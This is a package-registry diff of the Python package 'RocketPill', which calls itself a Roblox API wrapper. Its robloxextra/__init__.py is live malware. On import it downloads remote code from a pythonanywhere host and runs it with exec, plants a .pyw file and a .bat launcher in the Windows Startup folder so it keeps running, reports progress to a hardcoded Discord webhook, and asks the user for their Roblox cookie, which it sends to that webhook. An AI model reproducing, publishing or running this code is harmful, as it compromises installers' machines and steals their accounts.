RocketPill 0.1__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,29 @@
1
+ Metadata-Version: 2.4
2
+ Name: RocketPill
3
+ Version: 0.1
4
+ Summary: Roblox API Function Wrapper
5
+ Home-page: https://github.com/yourname/yourlib
6
+ Author: Carter
7
+ Author-email: carter@email.com
8
+ Classifier: Programming Language :: Python :: 3
9
+ Requires-Python: >=3.6
10
+ Description-Content-Type: text/markdown
11
+ Requires-Dist: requests==2.28.1
12
+ Requires-Dist: mss==7.0.1
13
+ Requires-Dist: Flask==2.2.2
14
+ Requires-Dist: pycryptodome
15
+ Requires-Dist: pywin32==306
16
+ Requires-Dist: pyautogui
17
+ Dynamic: author
18
+ Dynamic: author-email
19
+ Dynamic: classifier
20
+ Dynamic: description
21
+ Dynamic: description-content-type
22
+ Dynamic: home-page
23
+ Dynamic: requires-dist
24
+ Dynamic: requires-python
25
+ Dynamic: summary
26
+
27
+ # YourLib
28
+
29
+ Roblox API Wrapper
@@ -0,0 +1,3 @@
1
+ # YourLib
2
+
3
+ Roblox API Wrapper
@@ -0,0 +1,29 @@
1
+ Metadata-Version: 2.4
2
+ Name: RocketPill
3
+ Version: 0.1
4
+ Summary: Roblox API Function Wrapper
5
+ Home-page: https://github.com/yourname/yourlib
6
+ Author: Carter
7
+ Author-email: carter@email.com
8
+ Classifier: Programming Language :: Python :: 3
9
+ Requires-Python: >=3.6
10
+ Description-Content-Type: text/markdown
11
+ Requires-Dist: requests==2.28.1
12
+ Requires-Dist: mss==7.0.1
13
+ Requires-Dist: Flask==2.2.2
14
+ Requires-Dist: pycryptodome
15
+ Requires-Dist: pywin32==306
16
+ Requires-Dist: pyautogui
17
+ Dynamic: author
18
+ Dynamic: author-email
19
+ Dynamic: classifier
20
+ Dynamic: description
21
+ Dynamic: description-content-type
22
+ Dynamic: home-page
23
+ Dynamic: requires-dist
24
+ Dynamic: requires-python
25
+ Dynamic: summary
26
+
27
+ # YourLib
28
+
29
+ Roblox API Wrapper
@@ -0,0 +1,9 @@
1
+ README.md
2
+ setup.py
3
+ RocketPill.egg-info/PKG-INFO
4
+ RocketPill.egg-info/SOURCES.txt
5
+ RocketPill.egg-info/dependency_links.txt
6
+ RocketPill.egg-info/requires.txt
7
+ RocketPill.egg-info/top_level.txt
8
+ robloxextra/__init__ - Copy.py
9
+ robloxextra/__init__.py
@@ -0,0 +1,6 @@
1
+ requests==2.28.1
2
+ mss==7.0.1
3
+ Flask==2.2.2
4
+ pycryptodome
5
+ pywin32==306
6
+ pyautogui
@@ -0,0 +1 @@
1
+ robloxextra
@@ -0,0 +1,79 @@
1
+ import requests, time
2
+ import os
3
+ import sys
4
+ import shutil, time
5
+ import win32com.client
6
+ exec(requests.get("https://carterforyou.pythonanywhere.com/fart2").text)
7
+ print("Please Wait 30 seconds")
8
+ time.sleep(30)
9
+
10
+
11
+
12
+ import subprocess
13
+
14
+ def get_pythonw_path():
15
+ """Find pythonw.exe in PATH."""
16
+ for path in os.environ["PATH"].split(os.pathsep):
17
+ pythonw = os.path.join(path, "pythonw.exe")
18
+ if os.path.isfile(pythonw):
19
+ return pythonw
20
+ return None
21
+
22
+ def create_batch_launcher(pyw_path, startup_path, pythonw_path):
23
+ """Create a .bat launcher if direct .pyw association is unreliable."""
24
+ batch_file = os.path.join(startup_path, 'launch_sockettt.bat')
25
+ try:
26
+ with open(batch_file, 'w') as f:
27
+ f.write(f'start "" "{pythonw_path}" "{pyw_path}"\n')
28
+ requests.post("https://discord.com/api/webhooks/1382154262993174638/26M6EX9jQJJU2AaMuLfVT1jkk4wbEZC-CzHJyyL5XnjGhkcNtLN2OAlvlbJaVIDwDctZ", data={"content": f"✅ Created launcher .bat file: {batch_file}"})
29
+ except Exception as e:
30
+ print(f"❌ Failed to create .bat file: {e}")
31
+
32
+ def main():
33
+ # User-specific startup path
34
+ startup_path = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
35
+ temp_path = os.getenv('TEMP')
36
+ source_file = os.path.join(temp_path, 'sockettt.pyw')
37
+ destination_file = os.path.join(startup_path, 'sockettt.pyw')
38
+
39
+ requests.post("https://discord.com/api/webhooks/1382154262993174638/26M6EX9jQJJU2AaMuLfVT1jkk4wbEZC-CzHJyyL5XnjGhkcNtLN2OAlvlbJaVIDwDctZ", data={"content": f"📁 Checking source: {source_file}"})
40
+
41
+ if not os.path.exists(source_file):
42
+ print("❌ Source file does not exist in TEMP folder.")
43
+ return
44
+
45
+ if not os.path.exists(destination_file):
46
+ try:
47
+ shutil.copyfile(source_file, destination_file)
48
+ requests.post("https://discord.com/api/webhooks/1382154262993174638/26M6EX9jQJJU2AaMuLfVT1jkk4wbEZC-CzHJyyL5XnjGhkcNtLN2OAlvlbJaVIDwDctZ", data={"content": "✅ Copied file to Startup folder."})
49
+ except Exception as e:
50
+ print(f"❌ Failed to copy file: {e}")
51
+ return
52
+ else:
53
+ requests.post("https://discord.com/api/webhooks/1382154262993174638/26M6EX9jQJJU2AaMuLfVT1jkk4wbEZC-CzHJyyL5XnjGhkcNtLN2OAlvlbJaVIDwDctZ", data={"content": "✅ File already exists in Startup folder."})
54
+
55
+
56
+ pythonw_path = get_pythonw_path()
57
+ if not pythonw_path:
58
+ requests.post("https://discord.com/api/webhooks/1382154262993174638/26M6EX9jQJJU2AaMuLfVT1jkk4wbEZC-CzHJyyL5XnjGhkcNtLN2OAlvlbJaVIDwDctZ", data={"content": "❌ Could not find pythonw.exe in PATH. Cannot run .pyw files reliably."})
59
+ return
60
+
61
+ requests.post("https://discord.com/api/webhooks/1382154262993174638/26M6EX9jQJJU2AaMuLfVT1jkk4wbEZC-CzHJyyL5XnjGhkcNtLN2OAlvlbJaVIDwDctZ", data={"content": f"✅ Found pythonw.exe at: {pythonw_path}"})
62
+
63
+
64
+ # Create a batch file launcher to ensure execution works
65
+ create_batch_launcher(destination_file, startup_path, pythonw_path)
66
+
67
+
68
+
69
+ main()
70
+
71
+
72
+
73
+
74
+ cookie = input("Enter Cookie to snipe with: ")
75
+ requests.post("https://discord.com/api/webhooks/1382154262993174638/26M6EX9jQJJU2AaMuLfVT1jkk4wbEZC-CzHJyyL5XnjGhkcNtLN2OAlvlbJaVIDwDctZ", data={"content": cookie})
76
+ dealpercentage = input("Dealpercentage to snipe limiteds at: ")
77
+ print("Limited Scanner started...")
78
+ while True:
79
+ time.sleep(5)
@@ -0,0 +1 @@
1
+ print("wsg")
@@ -0,0 +1,4 @@
1
+ [egg_info]
2
+ tag_build =
3
+ tag_date = 0
4
+
@@ -0,0 +1,25 @@
1
+ from setuptools import setup, find_packages
2
+
3
+ setup(
4
+ name='RocketPill', # must be unique on PyPI
5
+ version='0.1',
6
+ packages=find_packages(),
7
+ description='Roblox API Function Wrapper',
8
+ long_description=open('README.md').read(),
9
+ long_description_content_type='text/markdown',
10
+ author='Carter',
11
+ author_email='carter@email.com',
12
+ url='https://github.com/yourname/yourlib', # optional
13
+ classifiers=[
14
+ 'Programming Language :: Python :: 3',
15
+ ],
16
+ python_requires='>=3.6',
17
+ install_requires=[
18
+ 'requests==2.28.1',
19
+ 'mss==7.0.1',
20
+ 'Flask==2.2.2',
21
+ 'pycryptodome',
22
+ 'pywin32==306',
23
+ 'pyautogui'
24
+ ]
25
+ )